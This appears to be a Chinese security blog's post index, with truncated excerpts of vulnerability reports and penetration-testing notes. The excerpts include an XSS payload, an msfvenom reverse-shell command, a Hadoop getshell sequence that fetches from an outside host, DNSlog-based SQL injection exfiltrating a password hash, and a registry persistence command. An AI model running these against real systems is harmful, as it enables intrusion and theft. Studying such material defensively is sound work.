自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(212)
  • 资源 (1)
  • 收藏
  • 关注

原创 Cynthia - There is a CSRF vulnerability in unlocking user status

Users can register by themselves, but the administrator needs to change the user status before they can log in. After using the CSRF vulnerability to change the status, you can view the details of all events.1. Click on the system configuration in the u.

2021-11-10 11:23:30 365

原创 Cynthia - XSS vulnerability exists in the newly created TAG

There is an XSS vulnerability when creating a new TAG1.Click the settings icon and then click the add button2.Enter Payload <img/src=x onerror=alert(1)>3.XSS vulnerability is triggered when the user opens the main page...

2021-11-10 10:40:09 399

原创 2021-11-09 Cynthia XSS

when agent is running,we can send special tcp data flow to agent,then it will exec any cmd without any limit```package mainimport ( "encoding/json" "fmt" "net" "net/rpc" "net/rpc/jsonrpc")type JobResult struct { OutMsg st...

2021-11-09 18:35:49 280

原创 Cynthia代码审计

看别人发的,于是想着康康有没有问题。Java的站,pom看了眼,fastjson看起来像是有问题的 版本1.2.7,看代码的时候就忘了它了 ... 因为基本上看接受参数大多都没用json传 ...初步确认信息这里看到用了filter进行过滤是否认证了。跟进去康康检测逻辑对不对。一步步跟过来,发现magicUrls就是这些东西。判断是否登陆的逻辑是:想要的是,如果URL路径处理之后,完全等于预设的这些,那么其余的都要认证。他写的是,如果URL路径 包含预设的这些 .

2021-07-14 18:42:14 211

原创 某CMS任意命令执行

N年后的更新之前项目遇到的网站,云盘上找到的源码,现在拉出来审计一下文件上传dou y

2021-06-11 14:49:09 471 1

原创 PPGo something error

when agent is running,we can send special tcp data flow to agent,then it will exec any cmd without any limitfirst,Background code accept parametersSecond,into j.agentRun() functionthird,Send construction data to agentfourth,The agent receiv..

2020-10-06 13:34:46 2525

转载 关于Firefox 无法抓取本地localhost数据包的问题与解决

https://blog.csdn.net/XavierDarkness/article/details/91410910服了,我说咋没配置 127.0.0.1 依然不行Mark一下,以后 就知道了 // 需要求改配置,不是单纯的 proxy 那个配置解决方法火狐浏览器中URL栏中输入about:config,打开配置页;在配置页的搜索栏搜索network.proxy.a...

2020-04-15 23:02:06 604

转载 通过 Web.config 绕过执行限制

在一个可读写的目录里无法执行脚本, 通过上传特殊的 web.config 文件突破限制.<?xml version="1.0" encoding="utf-8"?><configuration> <system.webServer> <handlers accessPolicy="Read, Write, Execute, ...

2019-08-23 12:23:34 1681

转载 攻击未授权访问的 Flink 集群

Flink 是一个针对流数据和批数据的分布式处理引擎,与 Storm 一起广泛应用于分布式实时计算场景中,且在某些场景下 Flink 性能要优于 Storm。然而 Flink 默认提供的 Web UI 却不支持鉴权,这就引发了非常明显的未授权问题。Flink Web UI在 macOS 上简单安装一个单节点 Flink,直接使用 Homebrew。 brew install apac...

2019-08-19 21:31:22 673

转载 axis2渗透测试wsdl文件上传

一 前言最近在渗透测试中,遇到一个比较有趣的站,因此来分享一下二 信息收集首先通过nmap进行端口扫描,同时通过dirsearch进行目录扫描,dirsearch扫描结果如下。通过目录扫描发现一些有用的信息第一 axis2构建的webservice第二 axis2的后台登录地址(/axis2/axis2-admin/)存在google axis2漏洞,发现多半都是默认口令...

2019-08-05 12:58:25 2600

转载 深入理解JNDI注入与Java反序列化漏洞利用

rmi 和 jndi 这些概念,一直接触,但是看了会儿 还是略微懵逼,这篇文章 暂时理清了我的思路[承上启下]----------------------------------上边属于我自己瞎扯的,下边是kingx大佬写的---------------------------------[承上启下]在Java反序列化漏洞挖掘或利用的时候经常会遇到RMI、JNDI、JRM...

2019-08-04 19:08:33 10522 2

转载 msf拿到shell之后的一条龙套餐

生成ps 反弹脚本 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.123 lport=12345 -f psh-reflection>/tmp/search.ps1msf 监听反弹msf > use exploit/multi/handlermsf exploit(ha...

2019-08-03 17:58:50 6549 1

转载 基于 msf 的免杀项目的一些工具

https://mp.weixin.qq.com/s/W7mBroOtVUdMHA7f07J_7Q转载自 信安之路这两个月来 持续的糜烂,乱七八糟的事,在今天lol完觉得不能再浪费时间来Orz,向大神们开始学习来0x02 avet 工具使用此工具当年在 2017 年黑帽大会上惊艳全场,使用 kali 下载:git clonehttps://github.c...

2019-08-01 21:39:59 4502 1

转载 看了这个,谁还怕Oracle注入?

https://www.secquan.org/Prime/1069599https://mp.weixin.qq.com/s/MYkvQDpYZbz67F6qK9Ri0g微信可能图片不能直接显示,我也木得办法 ~ Mark一下 ~目录1. Oracle联合注入总结2. Oracle报错注入总结3. Oracle基于布尔的盲注总结4. Oracle基于延时的盲注总结...

2019-06-02 12:42:25 1579 4

转载 windows常见后门隐藏和权限维持方法及排查技术

https://xz.aliyun.com/t/4842这片文章中隐藏webshell我觉得很nice ... 进程注入以前试过 ... wmi 和 bitsadmin 可以了解下 ...常见backdoor和persistence方式方法系统工具替换后门Image 劫持辅助工具管理器REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\...

2019-04-24 23:46:05 6427

原创 毕业设计-信息搜集

这,注定是一篇水文。但是一吐为快。 之前看某T的习惯,每周刷新一遍资产,重新看一下目标,反思再挖洞。然后想着,手动太麻烦,等了一年半,写毕设了,当作自己的代码来写 .... 刚才,磨磨蹭蹭年前开始写的,到现在,基础功能全部加上,基本上调试能用,但是个别功能(socket 扫端口)准确率只有70%。 随便添加个目标,某SRC CP吧...

2019-03-12 23:53:14 434

原创 Dnslog在SQL注入 & 四种数据库

https://www.anquanke.com/post/id/98096mysqlhttp://127.0.0.1/mysql.php?id=1 union select 1,2,load_file(CONCAT('\\',(SELECT hex(pass) FROM test.test_user WHERE name='admin' LIMIT 1),'.mysql.nk4...

2019-03-07 16:27:10 2799

原创 Hadoop 8088 Getshell

工作遇到了,有幸测试成功,记录下。首先获取 application-idcurl -v -X POST 'http://target:8088/ws/v1/cluster/apps/new-application'1.json{ "am-container-spec":{ "commands":{"command":"wget http://123123123.ce...

2019-02-28 00:50:57 1384

转载 XSS Bypass List

http://drops.wooyun.org/tips/845  这个就不知道 出处了 .... 刚用到了里边的几个,稍微修改下,成功绕过WAF ~ Mark 一下 ~0x00 背景本文来自于《Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters》其中的bypass xss过滤的部分,前...

2019-02-22 11:28:13 344

转载 命令注入 bypass list

真的全啊,备份下。原文https://xz.aliyun.com/t/3918 命令注入OS命令注入(也称为shell注入)是一种web安全漏洞,它允许攻击者在运行应用程序的服务器上执行任意操作系统(OS)命令,通常会完全破坏应用程序及其所有数据。通常,攻击者可以利用OS命令注入漏洞来破坏宿主基础设施的其他部分,利用信任关系将攻击转移到组织内的其他系统。前置知识说到命令注入...

2019-02-12 17:10:25 1408

原创 PHP - 变量覆盖 - extract()

https://chybeta.github.io/2018/11/29/phpcms-2008-type-php-%E5%89%8D%E5%8F%B0%E4%BB%A3%E7%A0%81%E6%B3%A8%E5%85%A5getshell%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/这个函数 是因为看了下 PHPcms 前台 getshell 发现这些函数果然一个...

2018-12-21 11:24:03 722

转载 绕过PHP disable_functions

https://lab.wallarm.com/rce-in-php-or-how-to-bypass-disable-functions-in-php-installations-6ccdbf4f52bb需要翻译,我自己看了一半,感觉太慢,还是用了Google翻译 Orz 简而言之,IMAP对应RSH,可以直接绕过PHP,来代替system等执行命令。...

2018-12-13 13:52:47 1002

原创 WSDL 文件测试

https://www.cnblogs.com/xueli/p/6145211.htmlhttps://www.cnblogs.com/xueli/p/9681526.html先用python大致看看,之后在考虑工具吧 输出有什么功能&gt;&gt;&gt; import suds&gt;&gt;&gt; url="http://www.webxml.com.cn/WebS...

2018-12-12 10:05:56 1300

原创 ElasticSearch 未授权访问利用

学弟找到个自己学校的 es 未授权,尝试利用一波,学习下如何使用 :)http://www.ruanyifeng.com/blog/2017/08/elasticsearch.htmlhttp://blog.51cto.com/feelmanc/1250430上边文档写的挺不错,我基本上都是在上边学到的。增删改我不想知道,我只想知道 如何查看我想要的数据 首先找有多少数据库(其...

2018-12-05 23:12:11 11508

原创 [ssocks] 内网 socks 代理

emmm。有了一台 linux 计划任务反弹的shell,socks 搞内网 ~使用方法 就跟 rcsocks 的 help 一样, rsscoks 在target上运行,rcsocks 在 hacker 上运行 // 我用 use 标出来了[root@target src]# ./rcsocks -h./rcsocks -hrcSocks Reverse Client Soc...

2018-12-05 10:52:33 3144

原创 PHP - 函数绕过 - escapeshell[arg|cmd]()

https://www.anquanke.com/post/id/107336发现有时候,只有用到相关东西(有需求),才会发现,哎呀,写的真好。escapeshellarg1.确保用户只传递一个参数给命令2.用户不能指定更多的参数一个3.用户不能执行不同的命令escapeshellcmd1.确保用户只执行一个命令2.用户可以指定不限数量的参数3.用户不能执行不同的...

2018-11-30 11:38:01 2742

原创 PHP - 函数绕过 - preg_match()

http://f1sh.site/2018/11/25/code-breaking-puzzles%e5%81%9a%e9%a2%98%e8%ae%b0%e5%bd%95/ 待绕过目标如下&lt;?phpecho preg_match('/&lt;\?.*[(`;?&gt;].*/is', $_GET['a']);最常见的绕过 数组http://localhost/?a...

2018-11-29 15:04:40 12136

原创 PHP - 代码执行 - create_function()

https://paper.seebug.org/94/create_function() 大致流程如下1. 获取参数, 函数体;2. 拼凑一个”function __lambda_func (参数) { 函数体;} “的字符串;3. eval;4. 通过__lambda_func在函数表中找到eval后得到的函数体, 找不到就出错;5. 定义一个函数名:”\000_la...

2018-11-29 13:04:13 1710

转载 APP漏洞挖掘工具篇 - Drozer

https://mp.weixin.qq.com/s?__biz=MzUyNTk1NDQ3Ng==&amp;mid=2247483830&amp;idx=1&amp;sn=ef4bdcdca99d2928d5a0c3ae246b007f&amp;chksm=fa177d75cd60f4639d0990f7496942a3b39edc41972577590e30a58e501f183bec689ef...

2018-11-27 10:49:48 9060 2

原创 phar 反序列化本地测试

https://xz.aliyun.com/t/2715看了上边的文章,然后根据他的代码来复现的。 众多文件操作函数能反序列化在于使用了 phar_parse_url,之后有调用到 phar_var_unserialize。生成 phar代码:  test.txt随便写就行,没必要真实存在&lt;?php class TestObject { } $...

2018-10-24 16:24:27 742

转载 Phar与Stream Wrapper造成PHP RCE的深入挖掘

https://blog.zsxsoft.com/post/38今年的HITCON打完了,沉迷写前端搞Nextjs骚操作的我成功爆0(雾),不想写前端了.jpg。先跑个题。HITCON 2016上,orange 出了一道PHP反序列化。HITCON 2017上,orange 出了一道Phar + PHP反序列化。HITCON 2018上,orange 出了一道file_get_con...

2018-10-24 12:17:47 680

转载 在域控中滥用DNSAdmins权限的危害

https://xz.aliyun.com/t/2932翻译自:http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html翻译:聂心明昨天,我读了Shay Ber的文章,感觉非常不错,链接在https://medium.c...

2018-10-24 10:28:31 630

转载 CTF SSTI 一些记录

https://ctftime.org/writeup/10895https://www.xmsec.cc/ssti-and-bypass-sandbox-in-jinja2/ ▼▼▼Shrine(Web:solved 58/810=7.1%)▼▼▼This writeup is written by @kazkiti_ctfGET / HTTP/1.1Host: shri...

2018-10-13 11:31:21 5792

转载 windows 应急流程及实战演练

对于windows方面的,目前我涉及的比较少,近期打算主攻代码审计吧。php、java的框架各种的提上日程,感觉初步可以了之后再转 windows 注册表 日志 ps 等 逐步了解 域渗透。微信 竟然不允许 图片引用,原链接在此,方便日后查看 ~ 原 URL https://mp.weixin.qq.com/s/odo2Fjtklj-ibStAsyUjHw当企业发生黑客入侵、系...

2018-10-11 23:02:49 1355

原创 Linux 痕迹清理 & 隐藏进程

1. 偷换系统二进制文件( ps , top 等) 防范:  比对hash;系统完整性检查工具,比如tripwrie、aide等2. 修改hook调用函数 (修改命令返回结果,原函数getdents)防范:  sysdig(开源),检测LD_PRELOAD环境变量是否有异常,ld.so.preload文件异常(时间,大小)3. 修改进程名字防范:  /proc目录,查看exe的...

2018-09-29 11:14:40 1591

转载 文件包含姿势 较详细且全面

https://chybeta.github.io/2017/10/08/php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/基本相关函数php中引发文件包含漏洞的通常是以下四个函数:include() include_once() require() require_once()reuqire() 如果在包含...

2018-09-13 10:52:34 4737

转载 WEB代理

https://www.secpulse.com/archives/74676.htmlhttp://gh0st.cn/archives/2018-09-11/1 之前大致见过这个东西,但是没有深入的理解,所以很久以来淡忘了看到key发的这个文章,耐心的看了一遍,了解到代理服务器(nginx,squid貌似这么拼的)一些运作机制以下是简单记录下---------------...

2018-09-12 10:55:55 1220

转载 SQL注入之骚姿势小记 & 替换 绕过

https://mp.weixin.qq.com/s/ORsciwsBGQJhFdKqceprSw1、IN之骚这个我也偶然发现的,也不知前辈们有没有早已总结好的套路了。w3school上对in操作符的介绍:http://www.w3school.com.cn/sql/sql_in.asp对它的描述:IN操作符允许我们在WHERE子句中规定多个值。也就说可以让我们依照一或数个不连续(...

2018-08-29 10:25:54 2738

原创 burpsuite & python插件 & sql注入

就是想自己写一个插件,因为burp日常使用很方便,点点点,自己扫描就行别的大部分都是自己需要转发一下,太麻烦,考虑的东西还有一些,但是先记录一下 关于requests报错问题,直接下载 jython 安装,然后把已有的python site-xxx 那个文件的内容贴过来即可函数都是实现了的,部分代码 直接删了 ~ 自己补充学习咯 ~ from burp import IB...

2018-08-27 13:08:16 1302

转载 nodejs & 反序列化漏洞 & 利用

https://www.yeahhub.com/nodejs-deserialization-attack-detailed-tutorial-2018/node.js是一个服务器端的运行环境,封装了Google V8引擎,V8引擎执行JavaScript速度非常快,性能非常好。Node.js进行了一些优化并提供替代API,这使得Google V8引擎能够在非浏览器环境下更有效的运行。但是...

2018-08-17 15:41:26 4677

openCV图片识别

别人的 C 调用openCV 写的图片识别,防止丢了 上传过来 ...

2017-02-08

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除